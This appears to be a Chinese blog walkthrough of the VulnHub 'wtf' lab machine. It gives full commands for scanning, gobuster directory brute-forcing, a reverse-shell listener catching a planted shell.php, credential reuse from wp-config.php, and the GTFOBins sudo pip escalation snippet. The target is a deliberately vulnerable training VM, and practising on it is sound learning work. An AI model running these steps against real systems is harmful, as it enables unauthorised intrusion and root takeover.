本周末实践的是vulnhub的wtf镜像,下载地址,https://download.vulnhub.com/wtf/wtf.rar,
用workstation打开,能扫描到地址,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.75,
再接着做目录爆破,这回用的gobuster,
需要先安装,sudo apt install gobuster,
然后还要安装爆破字典,sudo apt -y install seclists,
扫描,sudo gobuster dir --url http://192.168.137.75 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt,
访问http://192.168.137.75/zhkh/,
查看源码,发现wp-content子目录,
继续扫描,sudo gobuster dir --url http://192.168.137.75/zhkh/wp-content -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt,
访问http://192.168.137.75/zhkh/wp-content/uploads/,
继续访问子目录,
访问shell.php,并抓包,
发现反弹shell的接收端是192.168.1.14,端口是5555,
重新部署靶机和kali攻击机,都放到192.168.1.0/24网段里,
且配置kali攻击机的地址为192.168.1.14,靶机dhcp,
重新做地址扫描,sudo netdiscover -r 192.168.1.0/24,
访问http://192.168.1.128/zhkh/wp-content/uploads/,
在kali攻击机上开一个监听,sudo nc -nlvp 5555,
然后再次访问shell.php,就拿到了shell,
不是root,需要提权,查看文件,
从wp-config.php里查看到有用信息,ra/912391929129,
以及另一个类似密码的东西,`Db]f{He3HgO`(z,
发现ra/`Db]f{He3HgO`(z可ssh登录,并且pip是以root权限运行的,
从https://gtfobins.github.io/gtfobins/pip/上找到提权代码,
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
提权成功,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之wtf的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论